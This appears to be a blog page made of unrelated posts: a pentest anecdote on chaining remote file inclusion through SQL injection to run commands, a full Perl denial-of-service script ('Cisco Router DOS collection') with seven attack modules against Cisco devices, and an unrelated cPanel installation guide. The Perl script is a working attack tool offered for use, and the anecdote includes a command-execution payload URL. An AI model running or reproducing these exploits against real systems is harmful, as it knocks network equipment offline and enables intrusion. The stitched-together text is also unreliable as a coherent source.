IT_Solution for Learning

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http:///?param=http:///?param=1+union+select+''&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

reference:http://ptresearch.blogspot.com/2010/01/rfi-over-sql-injectioncross-site.html

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

#!/usr/bin/perl -w

#############################
#Cisco Router DOS collection#
# Devilzc0de Framework v.01 #
#############################

#thanks:mywisdom,gunslinger,flyff666,petimati n you!!
#programmer : kiddies A.K.A peneter
#Email : crasher_1412@yahoo.com or peneter@yahoo.com
#community thanks : Devilzc0de,jasakom,whitecyber,antijasakom and all i ve joined

use Socket;
use IO::Socket;


$host = "";
$pilih = "";
$host = @ARGV[ 0 ];
$pilih = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($pilih eq "") {
usage();
}
if ($pilih eq "1") {
cisco1();
}
elsif ($pilih eq "2") {
cisco2();
}
elsif ($pilih eq "3") {
cisco3();
}
elsif ($pilih eq "4") {
cisco4();
}
elsif ($pilih eq "5") {
cisco5();
}
elsif ($pilih eq "6") {
cisco6();
}
elsif ($pilih eq "7") {
cisco7();
}
elsif ($pilih eq "8") {
cisco8();
}
elsif ($pilih eq "9") {
cisco9();
} else {
printf "\ninvalid number....\n\n";
exit(1);
}

sub usage
{
print "\n Cisco Dos Exploits \n";
print "\n Devilzc0de Framework Dos v.0.1\n";
print "\nProgrammer :: kiddies A.K.A peneter\n";
printf"\n";
printf "\nUsage :: Cisco.pl \n";
printf "\nExploits Module :\n";
printf "[1] - Cisco IOS Router Denial of Service Vulnerability\n";
printf "[2] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
printf "[3] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
printf "[4] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
printf "[5] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
printf "[6] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
printf "[7] - Cisco IOS HTTP Denial of Service Vulnerability\n";
exit(1);
}
sub cisco1 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};
$sockd->autoflush(1);
print $sockd "GET /\%\% HTTP/1.0\n\n";
-close $sockd;
print "Packet sent ...\n";
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}
sub cisco2 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
close($sockd);
exit(1);
}

sub cisco3 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
close($sockd);
exit(1);
}
sub cisco4 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}

sub cisco5 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
my $string = "%%%%%XX%%%%%";

print "Input packets size : ";
$size = ;
chomp($size);

socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");

for ($i=0; $i<10000; $i++)
{ send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

printf "\nPackets sent ...\n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = ;
chomp $ports;
printf "\nNow checking server status ...\n";
sleep(2);

socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
exit(1);
}

sub cisco6 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string .= $vln x $num;
my $shc="\015\012";

my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...\n\n";

$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
exit(1);
}
sub cisco7 # Cisco IOS HTTP server DoS Vulnerability
{
my $serv = $host;
my $vuln = "GET /TEST?/ HTTP/1.0";

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};

print $sockd "$vuln\n\n";
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}

try this ok....if error contact me

Lets start giving some use to all our VPS servers, lets install a trial or a final license of Cpanel.

If you want a cpanel license you can get 1 for $ 12 / month or 70/month for a 10 pack. You should contact Aaron Conklin at custom.orders@ev1servers.net

In case you want a trial licence for cpanel you should go to : http://www.cpanel.net/store/

Ok. Few Steps to setup your VPS-CPANEL:

1 - Login to your VZMC and get inside your server
2 - Create a new VPS with the Sample Ve Config call vps.cpanel
3 - Select the ips you want to use in that VPS and the dns servers.
4 - Select RedHat Enterprise Template (not minimal)
5 - Dont select any addon.You dont need it for cpanel.
6 - Select the Space / Memory / CPU . All the normal stuff of your normal VPS. Put Start on boot and the rest of the normal stuff. Rememeber to use unlimited VPs.
7 - Go to your Ev1 Member section, open a ticket with your IP / and root password and request ev1 to get your VPS register in up2date. CHECK IT IF IT IS WELL CONFIGURE!! JUST IN CASE.
8 - Go in ssh and do the following steps:
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest


Article provided by WebHostGear.com

This should install cpanel without asking you any questions.

If you have any problems you should check: http://www.cpanel.net/install.html

9 - Login to : https://xxx.xxx.xxx.xxx:2087 and setup your server.
If you never setup a cpanel server, you can find some usefull information here: http://www.cpanel.net/docs.htm or search ev1 forum or ask me. I will be happy to help.

Well. Hopefully for some of you was usefull and will give you something else to try/offer in your VPS server.

Btw, it needs atleast 128 MB for cpanel to work.

If you have any problems with the guide let me know.

carlos

ps: i talk to some sw-soft people and they recomend to enable second-level quota (QUOTAUGIDLIMIT), i didnt try it myself. But i will let everyone when i try it.

Thanks to theuruguayan on the devilzc0de forums

reference:http://www.webhostgear.com/208.html